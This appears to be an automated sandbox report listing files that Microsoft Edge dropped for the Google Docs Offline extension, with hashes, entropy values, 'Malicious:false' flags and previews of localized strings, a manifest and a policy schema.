                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1337
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                      MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                      SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                      SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                      SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2846
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                      MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                      SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                      SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                      SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):934
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):963
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1320
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):884
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):980
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1941
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1969
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1674
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1063
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1333
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1263
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1074
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):879
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1205
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                      MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                      SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                      SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                      SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):843
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                      MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                      SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                      SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                      SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):912
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                      MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                      SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                      SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                      SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):11406
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                      MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                      SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                      SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                      SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[{"description":"treehash per file","signed_content":{"payload":"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
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):854
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                      MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                      SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                      SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                      SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2525
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                      MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                      SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                      SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                      SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):97
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                      MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                      SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                      SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                      SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
Malicious:false
Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with very long lines (4882)
Category:dropped
Size (bytes):122218
Entropy (8bit):5.439997574414675
Encrypted:false
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):291
Entropy (8bit):4.65176400421739
Encrypted:false
Malicious:false
Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with very long lines (4882)
Category:dropped
Size (bytes):130866
Entropy (8bit):5.425065147784983
Encrypted:false
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:Google Chrome extension, version 3
Category:dropped
Size (bytes):11185
Entropy (8bit):7.951995436832936
Encrypted:false
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1753
Entropy (8bit):5.8889033066924155
Encrypted:false
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
Category:dropped
Size (bytes):9815
Entropy (8bit):6.1716321262973315
Encrypted:false
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
Category:dropped
Size (bytes):10388
Entropy (8bit):6.174387413738973
Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                      MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                      SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                      SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                      SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):962
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                      MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                      SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                      SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                      SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                      Malicious:false
